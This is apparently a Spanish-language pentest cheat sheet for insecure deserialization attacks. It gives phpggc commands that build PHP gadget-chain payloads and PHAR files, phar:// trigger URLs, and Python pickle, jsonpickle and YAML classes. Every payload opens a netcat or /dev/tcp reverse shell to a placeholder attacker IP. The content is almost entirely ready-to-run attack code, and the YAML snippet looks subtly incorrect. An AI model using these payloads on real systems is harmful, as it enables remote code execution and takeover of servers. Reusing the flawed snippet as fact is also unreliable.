Listar gadget chains disponibles.
phpggc -l
phpggc -l <framework>
Generar un payload utilizando un gadget chains específico.
phpggc <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -b
phpggc <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
phpggc <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -b
Generar un archivo PHAR utilizando un gadget chains específico.
phpggc -p phar <gadget-chain> system "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash" -o file.phar
phpggc -p phar <gadget-chain> system "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> shell_exec "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
phpggc -p phar <gadget-chain> passthru "bash -c 'bash -i >& /dev/tcp/<attacker-IP-address>/<listen-port> 0>&1'" -o file.phar
http://example.com/?file=uploads/file.txt
http://example.com/?file=phar://uploads/file.phar
import base64, pickle, os
class RCE:
def __reduce__(self):
payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
return os.system, (payload,)
print(base64.b64encode(pickle.dumps(RCE())).decode())
import jsonpickle, os
class RCE:
def __reduce__(self):
payload = "nc -nv <attacker-IP-address> <listen-port> -e /bin/bash"
return os.system, (payload,)
print(jsonpickle.encode(RCE()))
import yaml, subprocess
class RCE:
def __reduce__(self):
return subprocess.Popen(["nc", "-nv", "<attacker-IP-address>", "<listen-port>", "-e", "/bin/bash"])
print(yaml.dump(RCE()))